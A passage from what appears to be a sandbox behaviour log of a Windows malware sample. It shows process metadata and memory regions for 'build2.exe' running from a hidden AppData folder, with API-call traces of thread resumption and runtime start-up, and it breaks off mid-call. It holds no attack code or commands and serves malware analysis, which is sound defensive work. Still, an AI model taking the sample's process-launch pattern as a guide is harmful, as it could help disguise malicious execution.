[300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0117.047] ResumeThread (hThread=0x74) returned 0x1 [0117.047] CloseHandle (hObject=0x74) returned 1 [0117.047] CloseHandle (hObject=0x78) returned 1 [0117.047] ExitProcess (uExitCode=0x0) [0117.048] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x2107d0) returned 1 [0117.048] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x2107d0 | out: hHeap=0x210000) returned 1 Process: id = "8" image_name = "build2.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" page_root = "0x439bb000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf10" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1280 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1281 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1282 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1283 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1284 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1285 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1286 start_va = 0x400000 end_va = 0x47afff monitored = 1 entry_point = 0x40b990 region_type = mapped_file name = "build2.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe") Region: id = 1287 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1288 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1289 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1290 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1291 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1292 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1293 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1294 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1295 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1296 start_va = 0x400000 end_va = 0x458fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1297 start_va = 0x1a0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1298 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1299 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1300 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1301 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1302 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1303 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1304 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1305 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1306 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1307 start_va = 0x460000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1308 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1309 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1310 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1311 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1312 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1313 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1314 start_va = 0x2f0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1315 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1316 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1317 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1318 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1319 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1320 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1321 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1322 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1323 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1324 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1325 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1326 start_va = 0x6b0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1327 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1328 start_va = 0x6b0000 end_va = 0x837fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1329 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1330 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1331 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1332 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1333 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1334 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1335 start_va = 0x210000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1336 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1337 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1338 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1339 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1340 start_va = 0x1de0000 end_va = 0x19a64fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Thread: id = 76 os_tid = 0xf24 [0117.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xa9cbf700, dwHighDateTime=0x1d8a8d3)) [0117.259] GetCurrentProcessId () returned 0xf20 [0117.259] GetCurrentThreadId () returned 0xf24 [0117.259] GetTickCount () returned 0x13b2283 [0117.259] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2077638813053) returned 1 [0117.259] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x42915d)) [0117.259] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.259] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2b0000 [0117.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0117.261] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0117.261] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0117.261] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0117.261] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0117.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x214) returned 0x2b07d0 [0117.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0117.263] GetCurrentThreadId () returned 0xf24 [0117.263] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425d83, hStdOutput=0x4260bc, hStdError=0x2b07d0)) [0117.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2b09f0 [0117.263] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.263] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.263] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.263] SetHandleCount (uNumber=0x20) returned 0x20 [0117.263] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" " [0117.263] GetEnvironmentStringsW () returned 0x5c2188* [0117.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0117.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x587) returned 0x2b11f8 [0117.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x2b11f8, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0117.264] FreeEnvironmentStringsW (penv=0x5c2188) returned 1 [0117.264] GetLastError () returned 0x5 [0117.264] SetLastError (dwErrCode=0x5) [0117.264] GetLastError () returned 0x5 [0117.264] SetLastError (dwErrCode=0x5) [0117.264] GetLastError () returned 0x5 [0117.264] SetLastError (dwErrCode=0x5) [0117.264] GetACP () returned 0x4e4 [0117.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2b1788 [0117.264] GetLastError () returned 0x5 [0117.264] SetLastError (dwErrCode=0x5) [0117.264] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.264] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0117.264] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0117.264] GetLastError () returned 0x5 [0117.264] SetLastError (dwErrCode=0x5) [0117.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.265] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0117.265] GetLastError () returned 0x5 [0117.265] SetLastError (dwErrCode=0x5) [0117.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ") returned 256 [0117.265] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.265] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0117.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 